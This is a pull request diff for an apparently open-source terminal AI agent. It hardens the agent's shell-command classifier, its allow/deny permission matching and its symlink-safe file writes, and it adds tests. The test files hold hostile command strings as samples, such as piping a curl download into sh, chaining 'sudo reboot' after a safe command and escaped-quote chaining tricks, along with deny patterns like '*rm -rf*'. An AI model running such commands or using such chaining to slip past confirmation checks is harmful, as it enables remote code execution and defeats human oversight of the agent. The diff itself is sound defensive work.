### PR TITLE
Harden the classifier + permission policy + file-write containment (0.3.2)

### DIFF
--- a/README.md
+++ b/README.md
@@ -139,8 +139,10 @@ opendot -p "..." --allow "pytest"                              # approve only th
 
 - `--yes` auto-approves anything that would otherwise prompt. Reversibility is
   unchanged: every action is still snapshotted and undoable.
-- `--allow PATTERN` / `--deny PATTERN` match a substring of the action (the
-  command or path); both are repeatable.
+- `--allow PATTERN` / `--deny PATTERN` match the action (the command or path) on
+  word boundaries — so `--deny rm` matches the `rm` command, not "refo**rm**at" —
+  or as a glob when the pattern contains `*`/`?` (e.g. `--deny "git push*"`,
+  `--deny "*.env"`). Both are repeatable.
 - Precedence is **deny > allow > (`--yes` ? approve : ask)** — so you can
   auto-approve broadly and still guarantee specific things never run.
 
@@ -242,7 +244,12 @@ CLI flags merge on top of them.
   conversation and its ledger where you left off.
 - A conservative **classifier** decides which shell commands are workspace-
   contained (auto-run, undoable) vs. escaping (confirmed first, marked
-  irreversible). When unsure, it asks.
+  irreversible). It classifies each command in a chain independently (so a safe
+  `a && b` can't smuggle a dangerous `b` past the prompt) and treats opaque
+  interpreters (`python`, `bash`, `docker`, …) as confirm-first, since a script
+  can do anything. When unsure, it asks. Built-in file writes are additionally
+  contained at the OS level so a symlinked path can't redirect them outside the
+  workspace.
 
 Honest boundary: opendot cannot undo effects that leave your machine (a sent
 email, a dropped remote database, a `git push`). It tells you *before* running

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -4,7 +4,7 @@ build-backend = "hatchling.build"
 
 [project]
 name = "opendot"
-version = "0.3.1"
+version = "0.3.2"
 description = "An interactive terminal AI agent you can fully undo — any model, acts on your real files, every action reversible."
 readme = "README.md"
 license = "MIT"

--- a/src/opendot/__init__.py
+++ b/src/opendot/__init__.py
@@ -13,6 +13,6 @@ from opendot.agent.config import AgentConfig
 from opendot.agent.events import Event
 from opendot.agent.loop import Agent
 
-__version__ = "0.3.1"
+__version__ = "0.3.2"
 
 __all__ = ["Agent", "AgentConfig", "Event", "__version__"]

--- a/src/opendot/agent/permissions.py
+++ b/src/opendot/agent/permissions.py
@@ -63,11 +63,12 @@ class Policy:
         low = prompt.lower()
         pat = pattern.lower()
         if any(ch in pat for ch in "*?["):
-            # Glob: match against the whole prompt, and also against each line so
-            # a leading/trailing anchor isn't needed for a prompt with context.
-            return fnmatch.fnmatch(low, pat) or any(
-                fnmatch.fnmatch(line, pat) for line in low.splitlines()
-            )
+            # Glob: match the whole prompt, and each line *stripped* of its
+            # indentation — confirm prompts indent the command (e.g. "  git push
+            # ...") so a pattern like "git push*" must match the trimmed line, not
+            # the leading whitespace, or a deny rule silently misses.
+            candidates = [low, *(ln.strip() for ln in low.splitlines())]
+            return any(fnmatch.fnmatch(c, pat) for c in candidates)
         # Word-boundary substring: the pattern must appear as whole token(s).
         return re.search(rf"(?<!\w){re.escape(pat)}(?!\w)", low) is not None
 

--- a/src/opendot/agent/permissions.py
+++ b/src/opendot/agent/permissions.py
@@ -6,9 +6,11 @@ configurable policy so a run can be driven unattended and a project can pin its
 own rules:
 
 - ``--yes`` auto-approves what would otherwise be an interactive prompt.
-- ``--allow PATTERN`` / ``--deny PATTERN`` match substrings of the action's
-  confirm prompt (which contains the command or path). ``deny`` always wins, so
-  you can auto-approve broadly with ``--yes`` yet still hard-block specifics.
+- ``--allow PATTERN`` / ``--deny PATTERN`` match the action's confirm prompt
+  (which contains the command or path) on word boundaries, or as an ``fnmatch``
+  glob when the pattern contains ``*``/``?``/``[`` (e.g. ``git push*``). ``deny``
+  always wins, so you can auto-approve broadly with ``--yes`` yet still hard-block
+  specifics.
 - An ``OPENDOT.md`` ``opendot`` block carries the same allow/deny lists for the
   project, so the rules travel with the repo.
 
@@ -20,6 +22,7 @@ non-interactive run with no ``--yes``).
 
 from __future__ import annotations
 
+import fnmatch
 import re
 from dataclasses import dataclass, field
 from pathlib import Path
@@ -37,18 +40,39 @@ def _split_list(value: str) -> list[str]:
 class Policy:
     """Allow/deny patterns plus an auto-approve flag.
 
-    Patterns are matched case-insensitively as plain substrings of the confirm
-    prompt (which embeds the command or path). ``deny`` is checked before
-    ``allow``.
+    Patterns match case-insensitively against the confirm prompt (which embeds
+    the command or path). Two forms, so a pattern can't accidentally match a
+    fragment of a longer word (``rm`` must not match "refo**rm**at"):
+
+    - A pattern with glob metacharacters (``*``, ``?``, ``[``) is matched as an
+      ``fnmatch`` glob against the whole prompt (or a whole line of it), e.g.
+      ``git push*`` or ``*.env``. Wrap it in ``*...*`` to match regardless of
+      surrounding context (``*rm -rf*``).
+    - Any other pattern is matched on **word boundaries**, so ``rm`` matches the
+      ``rm`` token but not "reformat", and ``git push`` matches that sequence.
+
+    ``deny`` is checked before ``allow``.
     """
 
     allow: list[str] = field(default_factory=list)
     deny: list[str] = field(default_factory=list)
     auto_approve: bool = False
 
-    def _matches(self, patterns: list[str], prompt: str) -> bool:
+    @staticmethod
+    def _pattern_matches(pattern: str, prompt: str) -> bool:
         low = prompt.lower()
-        return any(p.lower() in low for p in patterns)
+        pat = pattern.lower()
+        if any(ch in pat for ch in "*?["):
+            # Glob: match against the whole prompt, and also against each line so
+            # a leading/trailing anchor isn't needed for a prompt with context.
+            return fnmatch.fnmatch(low, pat) or any(
+                fnmatch.fnmatch(line, pat) for line in low.splitlines()
+            )
+        # Word-boundary substring: the pattern must appear as whole token(s).
+        return re.search(rf"(?<!\w){re.escape(pat)}(?!\w)", low) is not None
+
+    def _matches(self, patterns: list[str], prompt: str) -> bool:
+        return any(self._pattern_matches(p, prompt) for p in patterns)
 
     def decide(self, prompt: str) -> str:
         """Return 'deny', 'allow', or 'ask' for an action's confirm prompt."""

--- a/src/opendot/reversibility/classifier.py
+++ b/src/opendot/reversibility/classifier.py
@@ -169,26 +169,29 @@ def _mentions_outside_path(command: str, workdir: str) -> bool:
     open-time enforcement / a sandbox (see #130); this only decides whether to
     confirm.
     """
-    wd = str(Path(workdir).resolve())
-    # any ../ that could climb out, or absolute paths not under workdir
+    wd = Path(workdir).resolve()
+    # any ../ (or ..\) that could climb out
     if ".." in command:
         return True
     # writing to $HOME / ~ is outside the workspace
     if re.search(r"(^|\s)~(/|\s|$)|\$HOME", command):
         return True
-    # Check every path-like token: absolute paths, and relative tokens that
-    # resolve (through symlinks) to somewhere outside the workspace.
+    # Check every path-like token: absolute paths (POSIX / or Windows drive/UNC),
+    # and relative tokens containing a separator, resolved (through symlinks) and
+    # tested for containment with relative_to so path separators are handled
+    # correctly on every platform (not a "/"-only string prefix).
     for tok in re.findall(r"[^\s'\"|&;<>]+", command):
-        if "/" not in tok and not tok.startswith("/"):
+        p = Path(tok)
+        if not (p.is_absolute() or "/" in tok or "\\" in tok):
             continue  # not path-like
         try:
-            resolved = str(
-                (Path(workdir) / tok).resolve() if not tok.startswith("/") else Path(tok).resolve()
-            )
+            resolved = (p if p.is_absolute() else (wd / tok)).resolve()
         except (OSError, RuntimeError, ValueError):
             continue
-        if resolved != wd and not resolved.startswith(wd + "/"):
-            return True
+        try:
+            resolved.relative_to(wd)
+        except ValueError:
+            return True  # resolves outside the workspace
     return False
 
 

--- a/src/opendot/reversibility/classifier.py
+++ b/src/opendot/reversibility/classifier.py
@@ -194,9 +194,10 @@ def _mentions_outside_path(command: str, workdir: str) -> bool:
 
 def _split_segments(command: str) -> list[str]:
     """Split a command line into independently-run segments on shell operators,
-    without splitting inside quotes or $(...) subshells. Falls back to the whole
-    command if tokenization fails (better to classify the whole string than to
-    mis-split it)."""
+    without splitting inside quoted strings (single or double). It does NOT parse
+    $(...) subshells or backticks, so an operator inside one is treated as a real
+    split point — that only ever over-splits, which fails safe (extra confirms,
+    never a missed one). Falls back to the whole command if tokenization fails."""
     try:
         lex = shlex.shlex(command, posix=True, punctuation_chars=True)
         lex.whitespace_split = True

--- a/src/opendot/reversibility/classifier.py
+++ b/src/opendot/reversibility/classifier.py
@@ -42,12 +42,7 @@ _SAFE_COMMANDS = {
     "whoami",
     "clear",
     "cls",  # harmless read-only terminal commands
-    "python",
-    "python3",
-    "node",
-    "pytest",
-    "go",
-    "cargo",  # running code in-workspace
+    "pytest",  # test runner: in-workspace, snapshot covers any files it writes
     "touch",
     "mkdir",
     "cp",
@@ -69,6 +64,32 @@ _SAFE_COMMANDS = {
     "basename",
     "dirname",
     "realpath",
+}
+
+# Interpreters / launchers whose effects can't be read from the command text: a
+# script (or -c snippet) can open sockets, write outside the workspace, or exec
+# anything. `python foo.py` is exactly as opaque as `python -c "..."`, so we
+# can't safely auto-run any of them — they are confirm-first, not blocked.
+# (#130: treat interpreters as capabilities, not commands.)
+_OPAQUE_INTERPRETERS = {
+    "python",
+    "python3",
+    "node",
+    "deno",
+    "bun",
+    "ruby",
+    "perl",
+    "php",
+    "sh",
+    "bash",
+    "zsh",
+    "fish",
+    "make",
+    "docker",
+    "docker-compose",
+    "kubectl",
+    "go",
+    "cargo",  # `go run` / `cargo run` execute arbitrary code
 }
 
 # Signals that a command escapes the workspace or is hard/impossible to undo.
@@ -139,31 +160,93 @@ def _first_word(command: str) -> str:
 
 def _mentions_outside_path(command: str, workdir: str) -> bool:
     """Heuristic: does the command reference an absolute path or parent-escape
-    that leaves the workspace?"""
+    that leaves the workspace?
+
+    Path tokens are resolved with symlinks followed (``Path.resolve()``), so a
+    symlink *inside* the workspace that points out is caught too. This is a
+    best-effort text check, not a TOCTOU-proof guarantee — a path can be swapped
+    between this check and the command actually running. Real containment needs
+    open-time enforcement / a sandbox (see #130); this only decides whether to
+    confirm.
+    """
     wd = str(Path(workdir).resolve())
     # any ../ that could climb out, or absolute paths not under workdir
     if ".." in command:
         return True
-    for tok in re.findall(r"(?:^|\s)(/[^\s'\"]+)", command):
-        if not str(Path(tok).resolve()).startswith(wd):
-            return True
     # writing to $HOME / ~ is outside the workspace
     if re.search(r"(^|\s)~(/|\s|$)|\$HOME", command):
         return True
+    # Check every path-like token: absolute paths, and relative tokens that
+    # resolve (through symlinks) to somewhere outside the workspace.
+    for tok in re.findall(r"[^\s'\"|&;<>]+", command):
+        if "/" not in tok and not tok.startswith("/"):
+            continue  # not path-like
+        try:
+            resolved = str(
+                (Path(workdir) / tok).resolve() if not tok.startswith("/") else Path(tok).resolve()
+            )
+        except (OSError, RuntimeError, ValueError):
+            continue
+        if resolved != wd and not resolved.startswith(wd + "/"):
+            return True
     return False
 
 
-def classify(command: str, workdir: str) -> Verdict:
-    """Return a Verdict. reversible=True => safe to snapshot+run silently."""
-    cmd = command.strip()
-    if not cmd:
-        return Verdict(True)
+def _split_segments(command: str) -> list[str]:
+    """Split a command line into independently-run segments on shell operators,
+    without splitting inside quotes or $(...) subshells. Falls back to the whole
+    command if tokenization fails (better to classify the whole string than to
+    mis-split it)."""
+    try:
+        lex = shlex.shlex(command, posix=True, punctuation_chars=True)
+        lex.whitespace_split = True
+        list(lex)  # validate it tokenizes; we only need the parse to not raise
+    except ValueError:
+        return [command]
+    # shlex validated quoting; now split on top-level operators only. We re-scan
+    # the raw text but skip operators inside single/double quotes.
+    segments: list[str] = []
+    buf: list[str] = []
+    i = 0
+    quote: str | None = None
+    while i < len(command):
+        c = command[i]
+        if quote:
+            buf.append(c)
+            if c == quote:
+                quote = None
+            i += 1
+            continue
+        if c in ("'", '"'):
+            quote = c
+            buf.append(c)
+            i += 1
+            continue
+        # operator?
+        two = command[i : i + 2]
+        if two in ("&&", "||"):
+            segments.append("".join(buf))
+            buf = []
+            i += 2
+            continue
+        if c in (";", "|", "\n"):
+            segments.append("".join(buf))
+            buf = []
+            i += 1
+            continue
+        buf.append(c)
+        i += 1
+    segments.append("".join(buf))
+    return [s.strip() for s in segments if s.strip()]
 
+
+def _classify_segment(cmd: str, workdir: str) -> Verdict:
+    """Classify a single command segment (no shell operators)."""
     low = cmd.lower()
     head = _first_word(cmd)
 
     # Hard irreversible / escaping signals (checked first; fail safe).
-    if head in _PRIVILEGE or any(p == head for p in _PRIVILEGE):
+    if head in _PRIVILEGE:
         return Verdict(False, "runs with elevated privileges (sudo)")
     if head in _NETWORK:
         return Verdict(False, f"network access ({head})")
@@ -190,9 +273,32 @@ def classify(command: str, workdir: str) -> Verdict:
     if _mentions_outside_path(cmd, workdir):
         return Verdict(False, "touches paths outside the working directory")
 
+    # Opaque interpreters/launchers: their effects can't be read from the text, so
+    # confirm rather than auto-run (a script can do anything a -c snippet can).
+    if head in _OPAQUE_INTERPRETERS:
+        return Verdict(False, f"runs '{head}', whose effects can't be verified from the command")
+
     # Known-safe, workspace-contained commands auto-run.
     if head in _SAFE_COMMANDS:
         return Verdict(True)
 
     # Unknown command: fail safe — confirm, since we can't vouch for its effects.
     return Verdict(False, f"unrecognized command '{head}' — effects unknown")
+
+
+def classify(command: str, workdir: str) -> Verdict:
+    """Return a Verdict. reversible=True => safe to snapshot+run silently.
+
+    A command line may chain several commands (``a && b``, ``a | b``, ``a; b``).
+    Each segment is classified independently and the whole line is reversible
+    only if *every* segment is — the first escaping segment makes the line
+    non-reversible and supplies the reason. This stops a safe leading command
+    from smuggling a dangerous one past confirmation (#128).
+    """
+    if not command.strip():
+        return Verdict(True)
+    for segment in _split_segments(command):
+        verdict = _classify_segment(segment, workdir)
+        if not verdict.reversible:
+            return verdict
+    return Verdict(True)

--- a/src/opendot/reversibility/classifier.py
+++ b/src/opendot/reversibility/classifier.py
@@ -211,6 +211,15 @@ def _split_segments(command: str) -> list[str]:
     quote: str | None = None
     while i < len(command):
         c = command[i]
+        # A backslash escapes the next character (outside single quotes, where the
+        # shell treats backslash literally). Consume both so an escaped quote
+        # (\") can't open a fake quoted span and swallow a following operator,
+        # and an escaped operator (\&) isn't treated as a split point.
+        if c == "\\" and quote != "'" and i + 1 < len(command):
+            buf.append(c)
+            buf.append(command[i + 1])
+            i += 2
+            continue
         if quote:
             buf.append(c)
             if c == quote:

--- a/src/opendot/tools/local.py
+++ b/src/opendot/tools/local.py
@@ -468,6 +468,14 @@ class Toolbox:
         if target.is_symlink():
             target.unlink()  # never write through a symlinked final component
         target.write_bytes(data)
+        # Belt-and-suspenders: confirm the bytes actually landed inside the
+        # workspace. The component rebuild above should guarantee it, but if a
+        # concurrent swap slipped through, refuse loudly rather than report a
+        # false success (write_file turns this into an error).
+        try:
+            target.resolve().relative_to(self.workdir)
+        except ValueError:
+            raise OSError(f"refused: {target} escaped the workspace") from None
 
     def _is_ignored(self, p: Path) -> bool:
         return any(part in self._IGNORE for part in p.parts)

--- a/src/opendot/tools/local.py
+++ b/src/opendot/tools/local.py
@@ -10,12 +10,91 @@ becomes the tool result fed back to the model.
 from __future__ import annotations
 
 import difflib
+import errno
 import os
 import shutil
 import subprocess
+import sys
 from dataclasses import dataclass
 from pathlib import Path
 from typing import Any, Callable
+
+# --- Linux openat2 containment (strongest tier of _safe_write_within_workspace) --
+#
+# openat2(2) opens a path relative to a directory fd with resolution flags the
+# kernel enforces atomically. RESOLVE_BENEATH forbids escaping the dir_fd (via
+# ..  or an absolute path) and RESOLVE_NO_SYMLINKS forbids following any symlink
+# in the path — closing the TOCTOU races a userspace path check cannot. It's
+# Linux-only and not in the stdlib, so it's bound via ctypes and feature-detected
+# at runtime; every other platform uses the openat/O_NOFOLLOW + verify fallback.
+
+_RESOLVE_NO_SYMLINKS = 0x04
+_RESOLVE_BENEATH = 0x08
+# openat2 syscall number is stable on the common 64-bit arches (x86-64, arm64).
+_SYS_openat2 = (
+    {"x86_64": 437, "aarch64": 437, "arm64": 437}.get(os.uname().machine)
+    if (sys.platform.startswith("linux") and hasattr(os, "uname"))
+    else None
+)
+
+
+def _openat2_supported() -> bool:
+    return _SYS_openat2 is not None
+
+
+def _write_via_openat2(workdir, p: Path, data: bytes) -> bool:
+    """Write ``data`` to ``p`` using Linux openat2 with RESOLVE_BENEATH |
+    RESOLVE_NO_SYMLINKS, anchored at ``workdir``. Returns True on success, False
+    if openat2 isn't available/usable (caller then uses the portable fallback).
+
+    A path that escapes the workspace (symlink or ..) makes openat2 fail, so the
+    write simply doesn't happen through it — the caller's fallback then replaces
+    the offending entry with a real in-workspace file.
+    """
+    if not _openat2_supported():
+        return False
+    import ctypes
+
+    try:
+        rel = str(p.resolve().relative_to(Path(workdir).resolve()))
+    except ValueError:
+        return False  # not under the workspace; let the caller handle it
+
+    class _OpenHow(ctypes.Structure):
+        _fields_ = [
+            ("flags", ctypes.c_uint64),
+            ("mode", ctypes.c_uint64),
+            ("resolve", ctypes.c_uint64),
+        ]
+
+    libc = ctypes.CDLL(None, use_errno=True)
+    try:
+        dir_fd = os.open(str(Path(workdir).resolve()), os.O_RDONLY)
+    except OSError:
+        return False
+    try:
+        how = _OpenHow(
+            flags=os.O_WRONLY | os.O_CREAT | os.O_TRUNC,
+            mode=0o644,
+            resolve=_RESOLVE_BENEATH | _RESOLVE_NO_SYMLINKS,
+        )
+        fd = libc.syscall(
+            ctypes.c_long(_SYS_openat2),
+            ctypes.c_int(dir_fd),
+            ctypes.c_char_p(rel.encode()),
+            ctypes.byref(how),
+            ctypes.c_size_t(ctypes.sizeof(how)),
+        )
+        if fd < 0:
+            # ELOOP/EXDEV/etc: escape refused, or ENOSYS on a kernel < 5.6.
+            return False
+        with os.fdopen(fd, "wb") as f:
+            f.write(data)
+        return True
+    except (OSError, ValueError):
+        return False
+    finally:
+        os.close(dir_fd)
 
 
 def _max_output() -> int:
@@ -197,6 +276,159 @@ class Toolbox:
         except ValueError:
             return True
 
+    def _safe_write_within_workspace(self, p: Path, content: str) -> None:
+        """Write ``content`` to ``p`` (inside the workspace) with the strongest
+        open-time containment the OS offers, so a symlinked / swapped path
+        component can't redirect the write outside the snapshot boundary (the
+        TOCTOU cases a text-level path check can't close).
+
+        Behaviour is consistent across platforms: if any path component is a
+        symlink or would escape the workspace, the write does not follow it — the
+        offending entry is removed and a real in-workspace file is created in its
+        place. The *mechanism* differs by what the platform provides:
+
+        - Linux with ``openat2`` -> ``RESOLVE_BENEATH | RESOLVE_NO_SYMLINKS``:
+          the kernel refuses any symlink or ``..`` escape atomically (strongest).
+        - Any POSIX with ``dir_fd`` (macOS/BSD, older Linux) -> a component-by-
+          component ``openat`` walk with ``O_NOFOLLOW``, so *no* intermediate
+          symlink is ever followed either — the same containment as openat2,
+          built from openat primitives (race-free per component).
+        - Windows / no ``dir_fd`` -> plain open guarded by a realpath verify.
+        """
+        data = content.encode("utf-8")
+
+        # Tier 1: Linux openat2 with RESOLVE_BENEATH (atomic, race-free).
+        if _write_via_openat2(self.workdir, p, data):
+            return
+
+        # Tier 2: component-by-component openat + O_NOFOLLOW walk. Closes the
+        # intermediate-symlink race too, on any platform with dir_fd support.
+        if os.open in getattr(os, "supports_dir_fd", set()) and hasattr(os, "O_NOFOLLOW"):
+            if self._write_via_fd_walk(p, data):
+                return
+
+        # Tier 3: no dir_fd (e.g. Windows). Neutralise an escaping symlink, write,
+        # then verify the bytes landed inside the workspace.
+        self._write_plain_verified(p, data)
+
+    def _rel_parts(self, p: Path) -> list[str] | None:
+        """Lexical path components of ``p`` relative to the workspace, or None if
+        ``p`` is not lexically under it or contains a ``..`` segment.
+
+        Deliberately does NOT call ``resolve()`` — resolving would follow a
+        symlinked component and defeat the fd-walk, whose whole job is to refuse
+        exactly those. The walk enforces containment; this only supplies the
+        literal component names to walk.
+        """
+        # Make the candidate absolute against the (already-resolved) workdir and
+        # normalise lexically — NOT resolve(), which would follow a symlinked
+        # component and defeat the fd-walk. The fd-walk enforces containment; this
+        # just supplies the literal component names, anchored at self.workdir.
+        cand = Path(p)
+        if not cand.is_absolute():
+            cand = self.workdir / cand
+        cand = Path(os.path.normpath(str(cand)))
+        try:
+            rel = cand.relative_to(self.workdir)
+        except ValueError:
+            return None
+        parts = list(rel.parts)
+        if not parts or any(part == ".." for part in parts):
+            return None
+        return parts
+
+    def _write_via_fd_walk(self, p: Path, data: bytes) -> bool:
+        """Open every path component under the workspace with openat+O_NOFOLLOW,
+        so no symlink at *any* level is followed. Creates missing intermediate
+        dirs as real dirs. Returns True on success, False to fall through.
+
+        Anchoring each open to the previous component's fd (not a re-resolved
+        string) is what makes this race-free per component: a swap after we've
+        opened a dir fd can't change what that fd points at.
+        """
+        parts = self._rel_parts(p)
+        if not parts:
+            return False
+        nofollow = os.O_NOFOLLOW
+        wd_fd = None
+        cur_fd = None
+        try:
+            wd_fd = os.open(str(self.workdir), os.O_RDONLY | getattr(os, "O_DIRECTORY", 0))
+            cur_fd = wd_fd
+            # Walk/create intermediate directories, each O_NOFOLLOW-checked.
+            for comp in parts[:-1]:
+                try:
+                    nxt = os.open(
+                        comp, os.O_RDONLY | getattr(os, "O_DIRECTORY", 0) | nofollow, dir_fd=cur_fd
+                    )
+                except FileNotFoundError:
+                    os.mkdir(comp, 0o755, dir_fd=cur_fd)
+                    nxt = os.open(
+                        comp, os.O_RDONLY | getattr(os, "O_DIRECTORY", 0) | nofollow, dir_fd=cur_fd
+                    )
+                except OSError as exc:
+                    # ELOOP => an intermediate component is a symlink: refuse.
+                    if getattr(exc, "errno", None) in (errno.ELOOP, errno.ENOTDIR):
+                        return False
+                    raise
+                if cur_fd != wd_fd:
+                    os.close(cur_fd)
+                cur_fd = nxt
+            # Open (or replace) the final component as a real file.
+            name = parts[-1]
+            flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | nofollow
+            try:
+                fd = os.open(name, flags, 0o644, dir_fd=cur_fd)
+            except OSError as exc:
+                if getattr(exc, "errno", None) == errno.ELOOP:
+                    os.unlink(name, dir_fd=cur_fd)  # final component was a symlink
+                    fd = os.open(name, flags, 0o644, dir_fd=cur_fd)
+                else:
+                    return False
+            with os.fdopen(fd, "wb") as f:
+                f.write(data)
+            return True
+        except OSError:
+            return False
+        finally:
+            if cur_fd is not None and cur_fd != wd_fd:
+                os.close(cur_fd)
+            if wd_fd is not None:
+                os.close(wd_fd)
+
+    def _write_plain_verified(self, p: Path, data: bytes) -> None:
+        """Last-resort write for platforms without dir_fd (e.g. Windows).
+
+        Rebuilds every path component from the workspace root down as a REAL
+        directory — replacing any symlinked component (which could redirect the
+        write outside) with a real dir — then writes the file. This mirrors the
+        fd-walk's containment lexically, so an intermediate-symlink escape is
+        neutralised here too, not just on POSIX.
+        """
+        parts = self._rel_parts(p)
+        if parts is None:
+            # Not lexically under the workspace: refuse to write outside.
+            return
+        cur = self.workdir
+        for comp in parts[:-1]:
+            cur = cur / comp
+            if cur.is_symlink():
+                try:
+                    cur.unlink()  # replace an escaping symlinked dir with a real one
+                except OSError:
+                    return
+            if not cur.exists():
+                cur.mkdir(mode=0o755)
+            elif not cur.is_dir():
+                return  # a non-dir occupies a path component; refuse
+        target = cur / parts[-1]
+        if target.is_symlink():
+            try:
+                target.unlink()  # never write through a symlinked final component
+            except OSError:
+                return
+        target.write_bytes(data)
+
     def _is_ignored(self, p: Path) -> bool:
         return any(part in self._IGNORE for part in p.parts)
 
@@ -343,8 +575,15 @@ class Toolbox:
                     note="outside the workspace — not undoable" if outside else "",
                 )
             try:
-                p.parent.mkdir(parents=True, exist_ok=True)
-                p.write_text(content, encoding="utf-8")
+                if outside:
+                    # Already confirmed + recorded irreversible above; a plain
+                    # write is fine (containment doesn't apply outside the workspace).
+                    p.parent.mkdir(parents=True, exist_ok=True)
+                    p.write_text(content, encoding="utf-8")
+                else:
+                    # In-workspace: open-time containment so a symlinked target
+                    # can't redirect the write outside the snapshot boundary.
+                    self._safe_write_within_workspace(p, content)
             except Exception as exc:  # noqa: BLE001
                 return f"error writing {p}: {exc}"
             rel = self._rel(p)

--- a/src/opendot/tools/local.py
+++ b/src/opendot/tools/local.py
@@ -55,10 +55,18 @@ def _write_via_openat2(workdir, p: Path, data: bytes) -> bool:
         return False
     import ctypes
 
+    # Lexical relative path — NOT p.resolve(), which would dereference a symlinked
+    # component in userspace before openat2 sees it, defeating RESOLVE_NO_SYMLINKS.
+    # openat2 enforces containment itself and refuses symlinks atomically.
+    wd = Path(workdir).resolve()
+    cand = p if p.is_absolute() else wd / p
+    cand = Path(os.path.normpath(str(cand)))
     try:
-        rel = str(p.resolve().relative_to(Path(workdir).resolve()))
+        rel = str(cand.relative_to(wd))
     except ValueError:
-        return False  # not under the workspace; let the caller handle it
+        return False  # not lexically under the workspace; let the caller handle it
+    if rel == "." or rel.startswith(".."):
+        return False
 
     class _OpenHow(ctypes.Structure):
         _fields_ = [
@@ -407,26 +415,21 @@ class Toolbox:
         """
         parts = self._rel_parts(p)
         if parts is None:
-            # Not lexically under the workspace: refuse to write outside.
-            return
+            # Not lexically under the workspace: refuse (raise so write_file
+            # surfaces an error rather than falsely reporting success).
+            raise OSError(f"refused: {p} is not inside the workspace")
         cur = self.workdir
         for comp in parts[:-1]:
             cur = cur / comp
             if cur.is_symlink():
-                try:
-                    cur.unlink()  # replace an escaping symlinked dir with a real one
-                except OSError:
-                    return
+                cur.unlink()  # replace an escaping symlinked dir with a real one
             if not cur.exists():
                 cur.mkdir(mode=0o755)
             elif not cur.is_dir():
-                return  # a non-dir occupies a path component; refuse
+                raise OSError(f"refused: {cur} is not a directory")
         target = cur / parts[-1]
         if target.is_symlink():
-            try:
-                target.unlink()  # never write through a symlinked final component
-            except OSError:
-                return
+            target.unlink()  # never write through a symlinked final component
         target.write_bytes(data)
 
     def _is_ignored(self, p: Path) -> bool:

--- a/src/opendot/tools/local.py
+++ b/src/opendot/tools/local.py
@@ -38,8 +38,44 @@ _SYS_openat2 = (
 )
 
 
+_openat2_probe: bool | None = None
+
+
 def _openat2_supported() -> bool:
-    return _SYS_openat2 is not None
+    """True only if the running kernel actually has openat2 (>= 5.6), not just if
+    the syscall number is known — kernels < 5.6 return ENOSYS. Probed once (with a
+    deliberately bad fd so the probe never touches the filesystem) and cached."""
+    global _openat2_probe
+    if _SYS_openat2 is None:
+        return False
+    if _openat2_probe is not None:
+        return _openat2_probe
+    import ctypes
+
+    try:
+        libc = ctypes.CDLL(None, use_errno=True)
+
+        class _How(ctypes.Structure):
+            _fields_ = [
+                ("flags", ctypes.c_uint64),
+                ("mode", ctypes.c_uint64),
+                ("resolve", ctypes.c_uint64),
+            ]
+
+        how = _How(flags=os.O_RDONLY, mode=0, resolve=0)
+        # Bad dir_fd (-1) => the syscall returns EBADF if openat2 exists, ENOSYS
+        # if the kernel doesn't implement it. Either way nothing is opened.
+        libc.syscall(
+            ctypes.c_long(_SYS_openat2),
+            ctypes.c_int(-1),
+            ctypes.c_char_p(b"."),
+            ctypes.byref(how),
+            ctypes.c_size_t(ctypes.sizeof(how)),
+        )
+        _openat2_probe = ctypes.get_errno() != errno.ENOSYS
+    except Exception:  # noqa: BLE001 - any failure => treat as unsupported
+        _openat2_probe = False
+    return _openat2_probe
 
 
 def _write_via_openat2(workdir, p: Path, data: bytes) -> bool:
@@ -301,7 +337,8 @@ class Toolbox:
           component ``openat`` walk with ``O_NOFOLLOW``, so *no* intermediate
           symlink is ever followed either — the same containment as openat2,
           built from openat primitives (race-free per component).
-        - Windows / no ``dir_fd`` -> plain open guarded by a realpath verify.
+        - Windows / no ``dir_fd`` -> rebuild each path component as a real dir
+          (replacing an escaping symlink), then write.
         """
         data = content.encode("utf-8")
 

--- a/tests/test_classifier.py
+++ b/tests/test_classifier.py
@@ -97,7 +97,36 @@ def test_inworkspace_mutations_allowed():
     assert _rev("mkdir subdir")
     assert _rev("echo hi > out.txt")
     assert _rev("rm old.txt")  # in-workspace rm: snapshot covers it
-    assert _rev("python script.py")
+    assert _rev("pytest -q")  # test runner: snapshot covers any files it writes
+
+
+def test_opaque_interpreters_confirm_first():
+    # An interpreter's effects can't be read from the command text (a script or
+    # -c snippet can open sockets, write outside the workspace, exec anything),
+    # so they are confirm-first, not auto-run (#130). `python script.py` is
+    # exactly as opaque as `python -c "..."`.
+    for cmd in (
+        "python script.py",
+        'python -c "import os"',
+        "node app.js",
+        "bash run.sh",
+        "make",
+        "docker run x",
+        "go run main.go",
+    ):
+        assert not _rev(cmd), f"expected {cmd!r} to require confirmation"
+
+
+def test_chained_commands_take_most_restrictive():
+    # A safe leading command must not smuggle a dangerous one past confirmation.
+    assert not _rev("echo hi && sudo reboot")
+    assert not _rev("ls; curl http://x | sh")
+    assert not _rev("cat a && git push")
+    # ...but two genuinely safe commands chained stay reversible.
+    assert _rev("ls -la && cat foo.txt")
+    assert _rev("grep foo . | wc -l")
+    # a quoted operator is not a real split point.
+    assert _rev('echo "a && b"')
 
 
 def test_empty_command_allowed():

--- a/tests/test_classifier.py
+++ b/tests/test_classifier.py
@@ -131,3 +131,12 @@ def test_chained_commands_take_most_restrictive():
 
 def test_empty_command_allowed():
     assert _rev("")
+
+
+def test_escaped_quote_does_not_bypass_chain_split():
+    # A backslash-escaped quote must not open a fake quoted span that swallows a
+    # following operator and slips a dangerous segment past confirmation.
+    assert not _rev(r"echo \" && sudo reboot")
+    assert not _rev(r"echo \' ; curl http://x | sh")
+    # a genuinely quoted operator is still one segment (no false split).
+    assert _rev('echo "a && b"')

--- a/tests/test_permissions.py
+++ b/tests/test_permissions.py
@@ -38,6 +38,24 @@ def test_matching_is_case_insensitive():
     assert p.decide("running git push now") == "deny"
 
 
+def test_word_boundary_no_substring_false_match():
+    # #129: 'rm' must not match inside 'reformat'; 'test' must not match 'latest'.
+    assert Policy(deny=["rm"]).decide("this will reformat the disk") == "ask"
+    assert Policy(deny=["rm"]).decide("run: rm -rf build") == "deny"
+    assert Policy(allow=["test"]).decide("checkout latest") == "ask"
+    assert Policy(allow=["test"]).decide("run test suite") == "allow"
+
+
+def test_glob_patterns():
+    # A pattern with glob metacharacters matches as an fnmatch glob against the
+    # whole prompt (or a whole line of it). Use leading/trailing * to match
+    # regardless of surrounding context.
+    assert Policy(deny=["git push*"]).decide("git push origin main") == "deny"
